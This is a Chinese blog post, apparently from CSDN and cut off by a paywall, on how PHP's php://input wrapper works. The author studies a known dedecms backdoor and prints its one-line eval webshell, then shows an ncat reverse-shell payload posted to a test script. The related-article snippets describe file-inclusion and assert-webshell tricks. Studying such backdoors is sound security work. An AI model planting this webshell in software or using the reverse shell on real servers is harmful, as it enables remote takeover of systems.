php input 漏洞,php://input,php://filter,data URI schema的那些事

最新推荐文章于 2024-03-17 21:24:27 发布
最新推荐文章于 2024-03-17 21:24:27 发布
阅读量1.6k 收藏 1
点赞数
文章标签: php input 漏洞

一、php://input一句话木马

在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

@eval(file_get_contents('php://input'))

我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能。

$data=file_get_contents('php://input');

echo $data."
";

//@eval(file_get_contents('php://input'))

?>

发现php://input是用来接收post数据(这里有php://input的介绍)

112a3dccec392337014ad934cc7a04ce.png

注释掉phpinput.php的打印语句

使用firefox的hackbar提交上图显示的post data:

system('ncat -e /bin/bash localhost 1234');

测试了一下nc反弹shell的利用,成功

最低0.47元/天 解锁文章
网易浪潮工作室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
input date提交数据php,php://input & $_POST & $HTTP_RAW_POST_DATA 的详解
weixin_39751391的博客
03-22 157
PHP 用于开发 webservice 的 API 接口与客户端做数据交互时不一定会使用 PHP 可以处理的数据格式进行通信,比如 API 常用的 json xml,在此场景下我们需要使用其他的方式获取客户端发来的数据然后进行处理,下面我们就实例模拟下客户端请求 PHP API 场景下的数据交互方式。同时要理解 get 请求并未携带表单数据,get 请求的本质是请求服务器的某一资源,其向服务器发送...
iwebsec靶场文件包含漏洞-php://input伪协议及利用
qq_56041380的博客
04-05 623
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3023
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
文件包含漏洞inputfilter、zip)
最新发布
m0_70349048的博客
03-17 1261
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2694
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
31:WEB漏洞-文件操作之文件包含漏洞全解
mingyqf的博客
04-03 1594
31:WEB漏洞-文件操作之文件包含漏洞全解 思维导图 知识点 文件包含漏洞``原理,检测,类型,利用,修复等` `原理:将文件以脚本执行` `文件包含各个脚本代码``ASP,PHP,JSP,ASPXdeng``<!--#``include` `file=``"1.asp"` `-->``<!--#``include` `file=``"1.aspx"` `-->``<c:import url=``"http://thief.one/1.jsp"``>``<jsp
Hive Beeline连接报错:Could not open client transport with JDBC Uri: jdbc:hive2://hcmaster:10000/default
01-20
在使用Hive的Beeline客户端进行连接时,可能会遇到错误提示"Could not open client transport with JDBC Uri: jdbc:hive2://hcmaster:10000/default"。这个错误通常意味着Beeline无法通过JDBC URL成功建立到Hive ...
【基础篇】第06篇:PHP代码审计笔记--URL跳转漏洞1
08-03
PHP代码审计笔记——URL跳转漏洞1】主要讲解了PHP中常见的URL跳转漏洞及其绕过策略。这些漏洞往往由于对用户输入的URL没有进行有效的验证和限制,导致恶意用户能够控制页面跳转到任意目标,从而可能实施钓鱼攻击、...
DataURI:一个方便的类,用于在 PHP 中处理数据 URI
06-27
自述文件埃里克沃特2015-01-25 DataURI PHP 库#这个项目是什么# DataUri 类提供了一种访问和构造数据 URI 的便捷方法,但不应依赖它来执行 RFC 2397 标准。 本课程不会: 验证提供/解析的媒体类型验证提供/解析的...
UriTemplate:PHP URI模板(RFC 6570)支持URI扩展和提取
05-09
PHP URI模板这是基于PHP中的URI模板实现。 除了URI扩展之外,它还支持URI提取(200多个测试用例)。 URI模板用法扩张一个非常简单的用法(字符串扩展)。 <?phpuse Rize \ UriTemplate ;$ uri = new UriTemplate ...
UriHelper:PHP 的通用 URI 帮助类
06-11
一个简单的 URI 帮助器类,具有以下 RFC / STD 的实现: 用法 $ uri = new \ Enrise \ Uri ( 'http://usr:pss@example.com:81/mypath/myfile.html?a=b&b[]=2&b[]=3#myfragment' ); echo $ uri -> getScheme (); ...
PHP中使用CURL发送get/post请求上传图片批处理功能
10-17
PHP开发中,cURL库是一个非常强大的工具,它允许开发者通过HTTP协议发送各种请求,包括GET、POST以及上传文件等。本篇文章将详细介绍如何在PHP中使用cURL进行GET和POST请求,以及如何实现图片批处理上传的功能。 ...
Android WebView支持input file启用相机/选取照片功能
01-21
webview要调起input-file拍照或者选取文件功能,可以在webview.setWebChromeClient方法中重写指定的方法,来拦截webview的input件,并做我们相应的操作。 Android代码 webView.setWebChromeClient(new ...
url:PHP类,用于处理和操纵URL
04-28
网址PHP类,用于处理和操纵URL。 这是一个实用的一类库,完全独立于框架。 将URL字符串解析为对象添加和修改查询参数设置和修改网址的任何部分以PHP方式测试带有查询参数的URL是否相等支持协议相对URL 将绝对,相...
:earth_asia:使PHPURI有意义的函数-PHP开发
05-27
sabre / uri sabre / uri是一个轻量级的库,它提供了一些用于处理URI的功能,与RFC3986的规则保持一致。 轻量级库是受Node.js URL库的部分启发而创建的,旨在解决PHP应用程序中的实际问题。 部分受到Node.js URL库的...
file_get_contents("php://input")的使用方法
weixin_30940783的博客
05-28 8646
$data=file_get_contents("php://input"); //input是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充,比激活 always_popula...
【CTFHub】 RCE - php://input
cx_sam的博客
08-09 564
CTF WEB RCE php://input
ctfshow-web3(伪协议php://input的利用)
Welcome To Myon'Blog !
10-07 1384
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
文件包含漏洞利用
qq_56327824的博客
04-27 3102
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
php input函数
06-02
`php://input` 是一个可以访问 HTTP 请求主体的只读流。在 POST 请求中,请求参数通常以表单数据的形式发送到服务器,可以使用 `$_POST` 等全局变量来访问这些参数。但是,在处理上传文件或其他非表单数据的情况下,`php://input` 可以进行更加灵活的处理。可以使用 `file_get_contents('php://input')` 函数来读取 `php://input` 流中的数据。这个函数返回的是一个包含请求主体数据的字符串。需要注意的是,在读取 `php://input` 流之前,需要先调用 `php://input` 流中的数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值